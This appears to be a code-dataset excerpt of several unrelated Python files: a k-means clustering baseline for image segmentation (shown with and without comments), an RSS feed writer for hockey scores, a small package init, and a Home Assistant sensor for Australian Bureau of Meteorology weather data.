descs_all = np.zeros((num_imgs_max, desc_side * desc_side,
SIFT_DLEN), dtype=np.uint8)
masks_all = np.zeros((num_imgs_max, desc_side * desc_side), dtype=np.bool)
labels_all = None
actual_num_imgs = 0
# when descriptor matrix flattened, goes along rows first (rows change slow)
central_inds_h = (np.arange(desc_side) * SIFT_STEP +
(SIFT_STEP / 2)).reshape((desc_side, 1)).repeat(desc_side,
axis=1)
central_inds_w = (np.arange(desc_side) * SIFT_STEP +
(SIFT_STEP / 2)).reshape((1, desc_side)).repeat(desc_side,
axis=0)
central_inds_h, central_inds_w = central_inds_h.reshape(-1), \
central_inds_w.reshape(-1)
for b_i, batch in enumerate(dataloader):
if len(batch) == 3: # test dataloader
store_labels = True
if (labels_all is None):
labels_all = np.zeros((num_imgs_max, desc_side * desc_side),
dtype=np.int32)
imgs, labels, masks = batch
labels = labels.cpu().numpy().astype(np.int32)
else: # training dataloader
store_labels = False
imgs, _, _, masks = batch
# imgs currently channel first, [0-1] range, floats
imgs = (imgs * 255.).permute(0, 2, 3, 1).cpu().numpy().astype(np.uint8)
masks = masks.cpu().numpy().astype(np.bool)
curr_batch_sz, h, w, c = imgs.shape
assert (h == archetype_config.input_sz and w == archetype_config.input_sz
and c == archetype_config.in_channels)
if b_i < num_batches - 1:
assert (batch_sz == curr_batch_sz)
start = b_i * batch_sz
for i in range(curr_batch_sz):
grey_img = cv2.cvtColor(imgs[i, :, :, :], cv2.COLOR_RGB2GRAY)
locs, descs = vlfeat.vl_dsift(grey_img, step=SIFT_STEP)
descs = descs.transpose((1, 0)) # 40*40, 128
descs = descs.reshape(-1, SIFT_DLEN) # rows change slowest
# get the corresponding box central mask/label
mask = masks[i][central_inds_h, central_inds_w]
offset = start + i
descs_all[offset, :, :] = descs
masks_all[offset, :] = mask
if store_labels:
label = labels[i][central_inds_h, central_inds_w]
labels_all[offset, :] = label
actual_num_imgs += curr_batch_sz
descs_all = descs_all[:actual_num_imgs, :, :]
masks_all = masks_all[:actual_num_imgs, :]
num_unmasked = masks_all.sum()
if store_labels:
labels_all = labels_all[:actual_num_imgs, :]
samples_labels = labels_all[masks_all].reshape(-1)
assert (samples_labels.shape[0] == num_unmasked)
samples = descs_all[masks_all, :].reshape(-1, SIFT_DLEN)
assert (samples.shape[0] == num_unmasked)
if not store_labels:
return samples
else:
return samples, samples_labels
def _get_vectorised_colour_samples(archetype_config, dataloader):
num_batches, batch_sz = len(dataloader), archetype_config.dataloader_batch_sz
num_imgs_max = num_batches * batch_sz # estimate
img_sz = archetype_config.input_sz
# cluster individual pixels
imgs_all = np.zeros(
(num_imgs_max, img_sz, img_sz, archetype_config.in_channels),
dtype=np.uint8)
masks_all = np.zeros((num_imgs_max, img_sz, img_sz), dtype=np.bool)
labels_all = None
actual_num_imgs = 0
for b_i, batch in enumerate(dataloader):
if len(batch) == 3:
store_labels = True
if (labels_all is None):
labels_all = np.zeros((num_imgs_max, img_sz, img_sz), dtype=np.int32)
imgs, labels, masks = batch
labels = labels.cpu().numpy().astype(np.int32)
else:
store_labels = False
imgs, _, _, masks = batch
# channels last
imgs = (imgs * 255.).permute(0, 2, 3, 1).cpu().numpy().astype(np.uint8)
masks = masks.cpu().numpy().astype(np.bool)
curr_batch_sz, h, w, c = imgs.shape
assert (h == archetype_config.input_sz and w == archetype_config.input_sz
and c == archetype_config.in_channels)
if b_i < num_batches - 1:
assert (batch_sz == curr_batch_sz)
start = b_i * batch_sz
imgs_all[start:(start + curr_batch_sz), :, :, :] = imgs
masks_all[start:(start + curr_batch_sz), :, :] = masks
if store_labels:
labels_all[start:(start + curr_batch_sz), :, :] = labels
actual_num_imgs += curr_batch_sz
imgs_all = imgs_all[:actual_num_imgs, :, :, :]
masks_all = masks_all[:actual_num_imgs, :, :]
num_unmasked = masks_all.sum()
if store_labels:
labels_all = labels_all[:actual_num_imgs, :, :]
samples_labels = labels_all[masks_all].reshape(-1)
assert (samples_labels.shape[0] == num_unmasked)
samples = imgs_all[masks_all, :].reshape(-1, archetype_config.in_channels)
assert (samples.shape[0] == num_unmasked)
if not store_labels:
return samples
else:
return samples, samples_labels
def main():
# based on segmentation_multioutput_twohead - we pass in the config of the
# IID run we are comparing against, so the settings can be copied
parser = argparse.ArgumentParser()
parser.add_argument("--model_ind", type=int, required=True)
parser.add_argument("--out_root", type=str,
default="/scratch/shared/slow/xuji/iid_private")
parser.add_argument("--IID_model_ind", type=int, required=True)
parser.add_argument("--max_num_train", type=int, required=True)
parser.add_argument("--test_code", default=False, action="store_true")
parser.add_argument("--do_sift", default=False, action="store_true")
config = parser.parse_args()
config.out_dir = os.path.join(config.out_root, str(config.model_ind))
if not os.path.exists(config.out_dir):
os.makedirs(config.out_dir)
archetype_config_path = os.path.join(config.out_root,
str(config.IID_model_ind),
"config.pickle")
print("Loading archetype config from: %s" % archetype_config_path)
with open(archetype_config_path, "rb") as config_f:
archetype_config = pickle.load(config_f)
assert (config.IID_model_ind == archetype_config.model_ind)
assert (archetype_config.mode == "IID") # compare against fully unsup
sample_fn = _get_vectorised_colour_samples
if config.do_sift:
sample_fn = _get_vectorised_sift_samples
# set it to be only rgb (and ir if nec) but no sobel - we're clustering
# single pixel colours
archetype_config.include_rgb = True
archetype_config.no_sobel = True
if "Coco" in archetype_config.dataset:
assert (not archetype_config.using_IR)
archetype_config.in_channels = 3
elif archetype_config.dataset == "Potsdam": # IR
assert (archetype_config.using_IR)
archetype_config.in_channels = 4
# Data
# -------------------------------------------------------------------------
if "Coco" in archetype_config.dataset:
dataloaders_head_A, mapping_assignment_dataloader, \
mapping_test_dataloader = \
make_Coco_dataloaders(archetype_config)
elif archetype_config.dataset == "Potsdam":
dataloaders_head_A, mapping_assignment_dataloader, \
mapping_test_dataloader = \
make_Potsdam_dataloaders(archetype_config)
else:
raise NotImplementedError
# unlike in clustering script for STL - isn't any data from unknown classes
dataloaders_head_B = dataloaders_head_A
# networks and optimisers
# ------------------------------------------------------
assert (archetype_config.num_dataloaders == 1)
dataloader = dataloaders_head_B[0]
samples = sample_fn(archetype_config, dataloader)
print("got training samples")
sys.stdout.flush()
if config.test_code:
print("testing code, taking 10000 samples only")
samples = samples[:10000, :]
else:
num_samples_train = min(samples.shape[0], config.max_num_train)
print("taking %d samples" % num_samples_train)
chosen_inds = np.random.choice(samples.shape[0], size=num_samples_train,
replace=False)
samples = samples[chosen_inds, :]
print(samples.shape)
sys.stdout.flush()
kmeans = MiniBatchKMeans(n_clusters=archetype_config.gt_k, verbose=1).fit(
samples)
print("trained kmeans")
sys.stdout.flush()
# use mapping assign to assign output_k=gt_k to gt_k
# and also assess on its predictions, since it's identical to
# mapping_test_dataloader
assign_samples, assign_labels = sample_fn(archetype_config,
mapping_assignment_dataloader)
num_samples = assign_samples.shape[0]
assign_preds = kmeans.predict(assign_samples)
print("finished prediction for mapping assign/test data")
sys.stdout.flush()
assign_preds = torch.from_numpy(assign_preds).cuda()
assign_labels = torch.from_numpy(assign_labels).cuda()
if archetype_config.eval_mode == "hung":
match = _hungarian_match(assign_preds, assign_labels,
preds_k=archetype_config.gt_k,
targets_k=archetype_config.gt_k)
elif archetype_config.eval_mode == "orig": # flat!
match = _original_match(assign_preds, assign_labels,
preds_k=archetype_config.gt_k,
targets_k=archetype_config.gt_k)
elif archetype_config.eval_mode == "orig_soft":
assert (False) # not used
# reorder predictions to be same cluster assignments as gt_k
found = torch.zeros(archetype_config.gt_k)
reordered_preds = torch.zeros(num_samples).to(torch.int32).cuda()
for pred_i, target_i in match:
reordered_preds[assign_preds == pred_i] = target_i
found[pred_i] = 1
assert (found.sum() == archetype_config.gt_k) # each output_k must get mapped
acc = _acc(reordered_preds, assign_labels, archetype_config.gt_k)
print("got acc %f" % acc)
config.epoch_acc = [acc]
config.centroids = kmeans.cluster_centers_
config.match = match
# write results and centroids to model_ind output file
with open(os.path.join(config.out_dir, "config.pickle"), "w") as outfile:
pickle.dump(config, outfile)
with open(os.path.join(config.out_dir, "config.txt"), "w") as text_file:
text_file.write("%s" % config)
if __name__ == "__main__":
main()
| 36.618421
| 80
| 0.676967
|
from __future__ import print_function
import argparse
import os
import pickle
import sys
import cv2
import numpy as np
import torch
import vlfeat
from sklearn.cluster import MiniBatchKMeans
from src.utils.cluster.eval_metrics import _hungarian_match, _original_match, \
_acc
from src.utils.segmentation.data import make_Coco_dataloaders, \
make_Potsdam_dataloaders
SIFT_DLEN = 128
SIFT_STEP = 10
def _get_vectorised_sift_samples(archetype_config, dataloader):
num_batches, batch_sz = len(dataloader), archetype_config.dataloader_batch_sz
num_imgs_max = num_batches * batch_sz
img_sz = archetype_config.input_sz
desc_side = int(img_sz / SIFT_STEP)
print("img sz %d, desc_side %d" % (img_sz, desc_side))
sys.stdout.flush()
descs_all = np.zeros((num_imgs_max, desc_side * desc_side,
SIFT_DLEN), dtype=np.uint8)
masks_all = np.zeros((num_imgs_max, desc_side * desc_side), dtype=np.bool)
labels_all = None
actual_num_imgs = 0
central_inds_h = (np.arange(desc_side) * SIFT_STEP +
(SIFT_STEP / 2)).reshape((desc_side, 1)).repeat(desc_side,
axis=1)
central_inds_w = (np.arange(desc_side) * SIFT_STEP +
(SIFT_STEP / 2)).reshape((1, desc_side)).repeat(desc_side,
axis=0)
central_inds_h, central_inds_w = central_inds_h.reshape(-1), \
central_inds_w.reshape(-1)
for b_i, batch in enumerate(dataloader):
if len(batch) == 3:
store_labels = True
if (labels_all is None):
labels_all = np.zeros((num_imgs_max, desc_side * desc_side),
dtype=np.int32)
imgs, labels, masks = batch
labels = labels.cpu().numpy().astype(np.int32)
else:
store_labels = False
imgs, _, _, masks = batch
imgs = (imgs * 255.).permute(0, 2, 3, 1).cpu().numpy().astype(np.uint8)
masks = masks.cpu().numpy().astype(np.bool)
curr_batch_sz, h, w, c = imgs.shape
assert (h == archetype_config.input_sz and w == archetype_config.input_sz
and c == archetype_config.in_channels)
if b_i < num_batches - 1:
assert (batch_sz == curr_batch_sz)
start = b_i * batch_sz
for i in range(curr_batch_sz):
grey_img = cv2.cvtColor(imgs[i, :, :, :], cv2.COLOR_RGB2GRAY)
locs, descs = vlfeat.vl_dsift(grey_img, step=SIFT_STEP)
descs = descs.transpose((1, 0))
descs = descs.reshape(-1, SIFT_DLEN)
mask = masks[i][central_inds_h, central_inds_w]
offset = start + i
descs_all[offset, :, :] = descs
masks_all[offset, :] = mask
if store_labels:
label = labels[i][central_inds_h, central_inds_w]
labels_all[offset, :] = label
actual_num_imgs += curr_batch_sz
descs_all = descs_all[:actual_num_imgs, :, :]
masks_all = masks_all[:actual_num_imgs, :]
num_unmasked = masks_all.sum()
if store_labels:
labels_all = labels_all[:actual_num_imgs, :]
samples_labels = labels_all[masks_all].reshape(-1)
assert (samples_labels.shape[0] == num_unmasked)
samples = descs_all[masks_all, :].reshape(-1, SIFT_DLEN)
assert (samples.shape[0] == num_unmasked)
if not store_labels:
return samples
else:
return samples, samples_labels
def _get_vectorised_colour_samples(archetype_config, dataloader):
num_batches, batch_sz = len(dataloader), archetype_config.dataloader_batch_sz
num_imgs_max = num_batches * batch_sz
img_sz = archetype_config.input_sz
imgs_all = np.zeros(
(num_imgs_max, img_sz, img_sz, archetype_config.in_channels),
dtype=np.uint8)
masks_all = np.zeros((num_imgs_max, img_sz, img_sz), dtype=np.bool)
labels_all = None
actual_num_imgs = 0
for b_i, batch in enumerate(dataloader):
if len(batch) == 3:
store_labels = True
if (labels_all is None):
labels_all = np.zeros((num_imgs_max, img_sz, img_sz), dtype=np.int32)
imgs, labels, masks = batch
labels = labels.cpu().numpy().astype(np.int32)
else:
store_labels = False
imgs, _, _, masks = batch
imgs = (imgs * 255.).permute(0, 2, 3, 1).cpu().numpy().astype(np.uint8)
masks = masks.cpu().numpy().astype(np.bool)
curr_batch_sz, h, w, c = imgs.shape
assert (h == archetype_config.input_sz and w == archetype_config.input_sz
and c == archetype_config.in_channels)
if b_i < num_batches - 1:
assert (batch_sz == curr_batch_sz)
start = b_i * batch_sz
imgs_all[start:(start + curr_batch_sz), :, :, :] = imgs
masks_all[start:(start + curr_batch_sz), :, :] = masks
if store_labels:
labels_all[start:(start + curr_batch_sz), :, :] = labels
actual_num_imgs += curr_batch_sz
imgs_all = imgs_all[:actual_num_imgs, :, :, :]
masks_all = masks_all[:actual_num_imgs, :, :]
num_unmasked = masks_all.sum()
if store_labels:
labels_all = labels_all[:actual_num_imgs, :, :]
samples_labels = labels_all[masks_all].reshape(-1)
assert (samples_labels.shape[0] == num_unmasked)
samples = imgs_all[masks_all, :].reshape(-1, archetype_config.in_channels)
assert (samples.shape[0] == num_unmasked)
if not store_labels:
return samples
else:
return samples, samples_labels
def main():
parser = argparse.ArgumentParser()
parser.add_argument("--model_ind", type=int, required=True)
parser.add_argument("--out_root", type=str,
default="/scratch/shared/slow/xuji/iid_private")
parser.add_argument("--IID_model_ind", type=int, required=True)
parser.add_argument("--max_num_train", type=int, required=True)
parser.add_argument("--test_code", default=False, action="store_true")
parser.add_argument("--do_sift", default=False, action="store_true")
config = parser.parse_args()
config.out_dir = os.path.join(config.out_root, str(config.model_ind))
if not os.path.exists(config.out_dir):
os.makedirs(config.out_dir)
archetype_config_path = os.path.join(config.out_root,
str(config.IID_model_ind),
"config.pickle")
print("Loading archetype config from: %s" % archetype_config_path)
with open(archetype_config_path, "rb") as config_f:
archetype_config = pickle.load(config_f)
assert (config.IID_model_ind == archetype_config.model_ind)
assert (archetype_config.mode == "IID")
sample_fn = _get_vectorised_colour_samples
if config.do_sift:
sample_fn = _get_vectorised_sift_samples
# single pixel colours
archetype_config.include_rgb = True
archetype_config.no_sobel = True
if "Coco" in archetype_config.dataset:
assert (not archetype_config.using_IR)
archetype_config.in_channels = 3
elif archetype_config.dataset == "Potsdam": # IR
assert (archetype_config.using_IR)
archetype_config.in_channels = 4
# Data
# -------------------------------------------------------------------------
if "Coco" in archetype_config.dataset:
dataloaders_head_A, mapping_assignment_dataloader, \
mapping_test_dataloader = \
make_Coco_dataloaders(archetype_config)
elif archetype_config.dataset == "Potsdam":
dataloaders_head_A, mapping_assignment_dataloader, \
mapping_test_dataloader = \
make_Potsdam_dataloaders(archetype_config)
else:
raise NotImplementedError
# unlike in clustering script for STL - isn't any data from unknown classes
dataloaders_head_B = dataloaders_head_A
assert (archetype_config.num_dataloaders == 1)
dataloader = dataloaders_head_B[0]
samples = sample_fn(archetype_config, dataloader)
print("got training samples")
sys.stdout.flush()
if config.test_code:
print("testing code, taking 10000 samples only")
samples = samples[:10000, :]
else:
num_samples_train = min(samples.shape[0], config.max_num_train)
print("taking %d samples" % num_samples_train)
chosen_inds = np.random.choice(samples.shape[0], size=num_samples_train,
replace=False)
samples = samples[chosen_inds, :]
print(samples.shape)
sys.stdout.flush()
kmeans = MiniBatchKMeans(n_clusters=archetype_config.gt_k, verbose=1).fit(
samples)
print("trained kmeans")
sys.stdout.flush()
# mapping_test_dataloader
assign_samples, assign_labels = sample_fn(archetype_config,
mapping_assignment_dataloader)
num_samples = assign_samples.shape[0]
assign_preds = kmeans.predict(assign_samples)
print("finished prediction for mapping assign/test data")
sys.stdout.flush()
assign_preds = torch.from_numpy(assign_preds).cuda()
assign_labels = torch.from_numpy(assign_labels).cuda()
if archetype_config.eval_mode == "hung":
match = _hungarian_match(assign_preds, assign_labels,
preds_k=archetype_config.gt_k,
targets_k=archetype_config.gt_k)
elif archetype_config.eval_mode == "orig": # flat!
match = _original_match(assign_preds, assign_labels,
preds_k=archetype_config.gt_k,
targets_k=archetype_config.gt_k)
elif archetype_config.eval_mode == "orig_soft":
assert (False) # not used
# reorder predictions to be same cluster assignments as gt_k
found = torch.zeros(archetype_config.gt_k)
reordered_preds = torch.zeros(num_samples).to(torch.int32).cuda()
for pred_i, target_i in match:
reordered_preds[assign_preds == pred_i] = target_i
found[pred_i] = 1
assert (found.sum() == archetype_config.gt_k) # each output_k must get mapped
acc = _acc(reordered_preds, assign_labels, archetype_config.gt_k)
print("got acc %f" % acc)
config.epoch_acc = [acc]
config.centroids = kmeans.cluster_centers_
config.match = match
# write results and centroids to model_ind output file
with open(os.path.join(config.out_dir, "config.pickle"), "w") as outfile:
pickle.dump(config, outfile)
with open(os.path.join(config.out_dir, "config.txt"), "w") as text_file:
text_file.write("%s" % config)
if __name__ == "__main__":
main()
| true
| true
|
790b2d371432522b12c630954ab58dc667368862
| 1,496
|
py
|
Python
|
markup.py
|
ak212/python-hockey-rss
|
60dc71168db53dee0eaf2bf02a40a73f5e3527db
|
[
"MIT"
] | 1
|
2015-12-22T18:37:45.000Z
|
2015-12-22T18:37:45.000Z
|
markup.py
|
ak212/python-hockey-rss
|
60dc71168db53dee0eaf2bf02a40a73f5e3527db
|
[
"MIT"
] | null | null | null |
markup.py
|
ak212/python-hockey-rss
|
60dc71168db53dee0eaf2bf02a40a73f5e3527db
|
[
"MIT"
] | null | null | null |
import os
__author__ = "Aaron Koeppel"
__version__ = 1.0
def xmlMarkup(games, team_ab, team_name, team_record):
'''Markup the RSS feed using the data obtained.
:param games: list of games that the team played this season
:type games: list of GameData
:param team_ab: the team's abbreviated name
:type team_ab: string
:param team_name: the team's name
:type team_name: string'''
file_name = team_ab + "_feed.xml"
'''Used code from http://stackoverflow.com/questions/7935972/
writing-to-a-new-directory-in-python-without-changing-directory'''
script_dir = os.path.dirname(os.path.abspath(__file__))
dest_dir = os.path.join(script_dir, "feeds", team_ab)
try:
os.makedirs(dest_dir)
except OSError:
pass
path = os.path.join(dest_dir, file_name)
with open(path, 'w') as xml:
xml.write('<?xml version="1.0" encoding="UTF-8" ?>\n')
xml.write("<rss version='2.0'>\n")
xml.write("<channel>\n")
xml.write("<title>%s - %s</title>\n" % (team_name, team_record))
xml.write("<description>Latest %s scores</description>\n" % team_name)
xml.write("<link>http://espn.go.com/nhl/team/schedule/_/name/%s</link>\n"
% team_ab)
for game in games:
xml.write("<item>\n")
xml.write("<title>%s</title>\n" % game.headline)
xml.write("<link>%s</link>\n" % game.link)
xml.write("</item>\n")
xml.write("</channel>\n</rss>")
xml.close()
| 32.521739
| 79
| 0.625
|
import os
__author__ = "Aaron Koeppel"
__version__ = 1.0
def xmlMarkup(games, team_ab, team_name, team_record):
file_name = team_ab + "_feed.xml"
script_dir = os.path.dirname(os.path.abspath(__file__))
dest_dir = os.path.join(script_dir, "feeds", team_ab)
try:
os.makedirs(dest_dir)
except OSError:
pass
path = os.path.join(dest_dir, file_name)
with open(path, 'w') as xml:
xml.write('<?xml version="1.0" encoding="UTF-8" ?>\n')
xml.write("<rss version='2.0'>\n")
xml.write("<channel>\n")
xml.write("<title>%s - %s</title>\n" % (team_name, team_record))
xml.write("<description>Latest %s scores</description>\n" % team_name)
xml.write("<link>http://espn.go.com/nhl/team/schedule/_/name/%s</link>\n"
% team_ab)
for game in games:
xml.write("<item>\n")
xml.write("<title>%s</title>\n" % game.headline)
xml.write("<link>%s</link>\n" % game.link)
xml.write("</item>\n")
xml.write("</channel>\n</rss>")
xml.close()
| true
| true
|
790b2d4cde58cc65a51793d21e5e265754f9f859
| 140
|
py
|
Python
|
bactopia/__init__.py
|
bactopia/bactopia-ap
|
f87c55f3c9f8c7aca230d7a6146db078acd6d141
|
[
"MIT"
] | null | null | null |
bactopia/__init__.py
|
bactopia/bactopia-ap
|
f87c55f3c9f8c7aca230d7a6146db078acd6d141
|
[
"MIT"
] | 9
|
2019-05-20T17:05:09.000Z
|
2019-08-29T12:59:57.000Z
|
bactopia/__init__.py
|
bactopia/bactopia-ap
|
f87c55f3c9f8c7aca230d7a6146db078acd6d141
|
[
"MIT"
] | null | null | null |
"""Top-level package for Bactopia."""
__version__ = '2.1.0'
__all__ = [
'const',
'parse',
'summary'
]
from bactopia import *
| 11.666667
| 37
| 0.585714
|
__version__ = '2.1.0'
__all__ = [
'const',
'parse',
'summary'
]
from bactopia import *
| true
| true
|
790b2ddc74fef2c4be27a4d6c1b24dcbd933e151
| 11,621
|
py
|
Python
|
homeassistant/components/bom/sensor.py
|
alemuro/home-assistant
|
9b1315d8e55f0ca906c4c8a1b2ae8c2ea511dc90
|
[
"Apache-2.0"
] | 2
|
2019-10-19T15:07:32.000Z
|
2022-01-29T10:33:20.000Z
|
homeassistant/components/bom/sensor.py
|
alemuro/home-assistant
|
9b1315d8e55f0ca906c4c8a1b2ae8c2ea511dc90
|
[
"Apache-2.0"
] | 4
|
2021-02-08T21:05:14.000Z
|
2021-09-08T02:57:03.000Z
|
homeassistant/components/bom/sensor.py
|
alemuro/home-assistant
|
9b1315d8e55f0ca906c4c8a1b2ae8c2ea511dc90
|
[
"Apache-2.0"
] | 2
|
2019-01-21T05:49:23.000Z
|
2019-02-19T16:30:48.000Z
|
"""Support for Australian BOM (Bureau of Meteorology) weather service."""
import datetime
import ftplib
import gzip
import io
import json
import logging
import os
import re
import zipfile
import requests
import voluptuous as vol
import homeassistant.helpers.config_validation as cv
from homeassistant.components.sensor import PLATFORM_SCHEMA
from homeassistant.const import (
CONF_MONITORED_CONDITIONS,
TEMP_CELSIUS,
CONF_NAME,
ATTR_ATTRIBUTION,
CONF_LATITUDE,
CONF_LONGITUDE,
)
from homeassistant.helpers.entity import Entity
from homeassistant.util import Throttle
_RESOURCE = "http://www.bom.gov.au/fwo/{}/{}.{}.json"
_LOGGER = logging.getLogger(__name__)
ATTR_LAST_UPDATE = "last_update"
ATTR_SENSOR_ID = "sensor_id"
ATTR_STATION_ID = "station_id"
ATTR_STATION_NAME = "station_name"
ATTR_ZONE_ID = "zone_id"
ATTRIBUTION = "Data provided by the Australian Bureau of Meteorology"
CONF_STATION = "station"
CONF_ZONE_ID = "zone_id"
CONF_WMO_ID = "wmo_id"
MIN_TIME_BETWEEN_UPDATES = datetime.timedelta(seconds=60)
SENSOR_TYPES = {
"wmo": ["wmo", None],
"name": ["Station Name", None],
"history_product": ["Zone", None],
"local_date_time": ["Local Time", None],
"local_date_time_full": ["Local Time Full", None],
"aifstime_utc": ["UTC Time Full", None],
"lat": ["Lat", None],
"lon": ["Long", None],
"apparent_t": ["Feels Like C", TEMP_CELSIUS],
"cloud": ["Cloud", None],
"cloud_base_m": ["Cloud Base", None],
"cloud_oktas": ["Cloud Oktas", None],
"cloud_type_id": ["Cloud Type ID", None],
"cloud_type": ["Cloud Type", None],
"delta_t": ["Delta Temp C", TEMP_CELSIUS],
"gust_kmh": ["Wind Gust kmh", "km/h"],
"gust_kt": ["Wind Gust kt", "kt"],
"air_temp": ["Air Temp C", TEMP_CELSIUS],
"dewpt": ["Dew Point C", TEMP_CELSIUS],
"press": ["Pressure mb", "mbar"],
"press_qnh": ["Pressure qnh", "qnh"],
"press_msl": ["Pressure msl", "msl"],
"press_tend": ["Pressure Tend", None],
"rain_trace": ["Rain Today", "mm"],
"rel_hum": ["Relative Humidity", "%"],
"sea_state": ["Sea State", None],
"swell_dir_worded": ["Swell Direction", None],
"swell_height": ["Swell Height", "m"],
"swell_period": ["Swell Period", None],
"vis_km": ["Visability km", "km"],
"weather": ["Weather", None],
"wind_dir": ["Wind Direction", None],
"wind_spd_kmh": ["Wind Speed kmh", "km/h"],
"wind_spd_kt": ["Wind Speed kt", "kt"],
}
def validate_station(station):
"""Check that the station ID is well-formed."""
if station is None:
return
station = station.replace(".shtml", "")
if not re.fullmatch(r"ID[A-Z]\d\d\d\d\d\.\d\d\d\d\d", station):
raise vol.error.Invalid("Malformed station ID")
return station
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
{
vol.Inclusive(CONF_ZONE_ID, "Deprecated partial station ID"): cv.string,
vol.Inclusive(CONF_WMO_ID, "Deprecated partial station ID"): cv.string,
vol.Optional(CONF_NAME): cv.string,
vol.Optional(CONF_STATION): validate_station,
vol.Required(CONF_MONITORED_CONDITIONS, default=[]): vol.All(
cv.ensure_list, [vol.In(SENSOR_TYPES)]
),
}
)
def setup_platform(hass, config, add_entities, discovery_info=None):
"""Set up the BOM sensor."""
station = config.get(CONF_STATION)
zone_id, wmo_id = config.get(CONF_ZONE_ID), config.get(CONF_WMO_ID)
if station is not None:
if zone_id and wmo_id:
_LOGGER.warning(
"Using config %s, not %s and %s for BOM sensor",
CONF_STATION,
CONF_ZONE_ID,
CONF_WMO_ID,
)
elif zone_id and wmo_id:
station = "{}.{}".format(zone_id, wmo_id)
else:
station = closest_station(
config.get(CONF_LATITUDE),
config.get(CONF_LONGITUDE),
hass.config.config_dir,
)
if station is None:
_LOGGER.error("Could not get BOM weather station from lat/lon")
return
bom_data = BOMCurrentData(station)
try:
bom_data.update()
except ValueError as err:
_LOGGER.error("Received error from BOM Current: %s", err)
return
add_entities(
[
BOMCurrentSensor(bom_data, variable, config.get(CONF_NAME))
for variable in config[CONF_MONITORED_CONDITIONS]
]
)
class BOMCurrentSensor(Entity):
"""Implementation of a BOM current sensor."""
def __init__(self, bom_data, condition, stationname):
"""Initialize the sensor."""
self.bom_data = bom_data
self._condition = condition
self.stationname = stationname
@property
def name(self):
"""Return the name of the sensor."""
if self.stationname is None:
return "BOM {}".format(SENSOR_TYPES[self._condition][0])
return "BOM {} {}".format(self.stationname, SENSOR_TYPES[self._condition][0])
@property
def state(self):
"""Return the state of the sensor."""
return self.bom_data.get_reading(self._condition)
@property
def device_state_attributes(self):
"""Return the state attributes of the device."""
attr = {
ATTR_ATTRIBUTION: ATTRIBUTION,
ATTR_LAST_UPDATE: self.bom_data.last_updated,
ATTR_SENSOR_ID: self._condition,
ATTR_STATION_ID: self.bom_data.latest_data["wmo"],
ATTR_STATION_NAME: self.bom_data.latest_data["name"],
ATTR_ZONE_ID: self.bom_data.latest_data["history_product"],
}
return attr
@property
def unit_of_measurement(self):
"""Return the units of measurement."""
return SENSOR_TYPES[self._condition][1]
def update(self):
"""Update current conditions."""
self.bom_data.update()
class BOMCurrentData:
"""Get data from BOM."""
def __init__(self, station_id):
"""Initialize the data object."""
self._zone_id, self._wmo_id = station_id.split(".")
self._data = None
self.last_updated = None
def _build_url(self):
"""Build the URL for the requests."""
url = _RESOURCE.format(self._zone_id, self._zone_id, self._wmo_id)
_LOGGER.debug("BOM URL: %s", url)
return url
@property
def latest_data(self):
"""Return the latest data object."""
if self._data:
return self._data[0]
return None
def get_reading(self, condition):
"""Return the value for the given condition.
BOM weather publishes condition readings for weather (and a few other
conditions) at intervals throughout the day. To avoid a `-` value in
the frontend for these conditions, we traverse the historical data
for the latest value that is not `-`.
Iterators are used in this method to avoid iterating needlessly
through the entire BOM provided dataset.
"""
condition_readings = (entry[condition] for entry in self._data)
return next((x for x in condition_readings if x != "-"), None)
def should_update(self):
"""Determine whether an update should occur.
BOM provides updated data every 30 minutes. We manually define
refreshing logic here rather than a throttle to keep updates
in lock-step with BOM.
If 35 minutes has passed since the last BOM data update, then
an update should be done.
"""
if self.last_updated is None:
# Never updated before, therefore an update should occur.
return True
now = datetime.datetime.now()
update_due_at = self.last_updated + datetime.timedelta(minutes=35)
return now > update_due_at
@Throttle(MIN_TIME_BETWEEN_UPDATES)
def update(self):
"""Get the latest data from BOM."""
if not self.should_update():
_LOGGER.debug(
"BOM was updated %s minutes ago, skipping update as"
" < 35 minutes, Now: %s, LastUpdate: %s",
(datetime.datetime.now() - self.last_updated),
datetime.datetime.now(),
self.last_updated,
)
return
try:
result = requests.get(self._build_url(), timeout=10).json()
self._data = result["observations"]["data"]
# set lastupdate using self._data[0] as the first element in the
# array is the latest date in the json
self.last_updated = datetime.datetime.strptime(
str(self._data[0]["local_date_time_full"]), "%Y%m%d%H%M%S"
)
return
except ValueError as err:
_LOGGER.error("Check BOM %s", err.args)
self._data = None
raise
def _get_bom_stations():
"""Return {CONF_STATION: (lat, lon)} for all stations, for auto-config.
This function does several MB of internet requests, so please use the
caching version to minimise latency and hit-count.
"""
latlon = {}
with io.BytesIO() as file_obj:
with ftplib.FTP("ftp.bom.gov.au") as ftp:
ftp.login()
ftp.cwd("anon2/home/ncc/metadata/sitelists")
ftp.retrbinary("RETR stations.zip", file_obj.write)
file_obj.seek(0)
with zipfile.ZipFile(file_obj) as zipped:
with zipped.open("stations.txt") as station_txt:
for _ in range(4):
station_txt.readline() # skip header
while True:
line = station_txt.readline().decode().strip()
if len(line) < 120:
break # end while loop, ignoring any footer text
wmo, lat, lon = (
line[a:b].strip() for a, b in [(128, 134), (70, 78), (79, 88)]
)
if wmo != "..":
latlon[wmo] = (float(lat), float(lon))
zones = {}
pattern = (
r'<a href="/products/(?P<zone>ID[A-Z]\d\d\d\d\d)/'
r'(?P=zone)\.(?P<wmo>\d\d\d\d\d).shtml">'
)
for state in ("nsw", "vic", "qld", "wa", "tas", "nt"):
url = "http://www.bom.gov.au/{0}/observations/{0}all.shtml".format(state)
for zone_id, wmo_id in re.findall(pattern, requests.get(url).text):
zones[wmo_id] = zone_id
return {"{}.{}".format(zones[k], k): latlon[k] for k in set(latlon) & set(zones)}
def bom_stations(cache_dir):
"""Return {CONF_STATION: (lat, lon)} for all stations, for auto-config.
Results from internet requests are cached as compressed JSON, making
subsequent calls very much faster.
"""
cache_file = os.path.join(cache_dir, ".bom-stations.json.gz")
if not os.path.isfile(cache_file):
stations = _get_bom_stations()
with gzip.open(cache_file, "wt") as cache:
json.dump(stations, cache, sort_keys=True)
return stations
with gzip.open(cache_file, "rt") as cache:
return {k: tuple(v) for k, v in json.load(cache).items()}
def closest_station(lat, lon, cache_dir):
"""Return the ZONE_ID.WMO_ID of the closest station to our lat/lon."""
if lat is None or lon is None or not os.path.isdir(cache_dir):
return
stations = bom_stations(cache_dir)
def comparable_dist(wmo_id):
"""Create a psudeo-distance from latitude/longitude."""
station_lat, station_lon = stations[wmo_id]
return (lat - station_lat) ** 2 + (lon - station_lon) ** 2
return min(stations, key=comparable_dist)
| 33.880466
| 86
| 0.61234
